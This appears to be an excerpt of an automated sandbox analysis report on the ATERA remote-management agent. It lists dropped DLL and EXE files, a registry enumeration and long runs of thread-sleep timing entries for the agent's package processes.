                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\clist.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebHeaderCollection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeRegistry key enumerated: More than 126 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 5444Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2724Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5180Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7172Thread sleep count: 3780 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7172Thread sleep count: 5867 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7420Thread sleep time: -27670116110564310s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7420Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7452Thread sleep time: -70000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7464Thread sleep time: -2767011611056431s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7440Thread sleep time: -180000s >= -30000s
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 7400Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7728Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7672Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7712Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7680Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7820Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7888Thread sleep count: 2936 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7880Thread sleep count: 6701 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8112Thread sleep count: 39 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8112Thread sleep time: -35971150943733603s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8112Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8172Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7188Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8148Thread sleep time: -180000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8180Thread sleep count: 6094 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8176Thread sleep count: 3776 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -26747778906878833s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -599875s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -599765s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -599655s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -599547s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -599437s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -599327s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -599218s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -599099s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -598984s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -598875s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -598755s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -598640s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -598531s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -598411s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -598296s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -598187s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -598077s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -597968s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -597859s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -597750s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -597640s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -597531s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -597421s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -597312s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -597203s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -597093s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -596984s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -596875s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -596765s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -596654s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -596547s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -596422s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -596312s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -596203s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -596093s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -595984s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -595875s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -595765s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -595656s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6764Thread sleep time: -595547s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep count: 39 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -35971150943733603s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 332Thread sleep count: 5299 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -599860s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -599625s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -599202s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -599075s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -598954s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -598829s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -598711s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -598601s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -598478s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -598297s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -598141s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -598024s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -597907s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 332Thread sleep count: 4482 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -597793s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -597681s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -597569s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -597438s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -597320s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -597204s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -597079s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -596954s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -596838s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -596719s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -596594s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -596484s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -596373s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -596250s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -596141s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -596032s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -595907s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -595797s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -595688s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -595563s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -595438s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -595313s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -595188s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -595077s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -594954s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -594829s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -594704s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -594579s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -594454s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -594329s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -594204s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -594079s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -593954s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -593829s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -593704s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -593579s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -593454s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -593329s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -593214s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -593094s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -592969s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 4600Thread sleep time: -592847s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 3368Thread sleep count: 2910 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 3368Thread sleep count: 3950 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 1780Thread sleep time: -20291418481080494s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 1780Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 5316Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7348Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7432Thread sleep count: 1502 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7432Thread sleep count: 128 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 5596Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1988Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 4128Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 7684Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 5824Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 7720Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7216Thread sleep count: 6277 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep count: 36 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -33204139332677172s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -599887s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -599766s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7216Thread sleep count: 3473 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -599641s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -599516s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -599404s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -599283s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -599172s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -599063s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -598953s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -598813s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -598688s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -598578s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -598464s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -598348s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -598227s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -598114s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -597982s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -597875s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -597750s >= -30000s
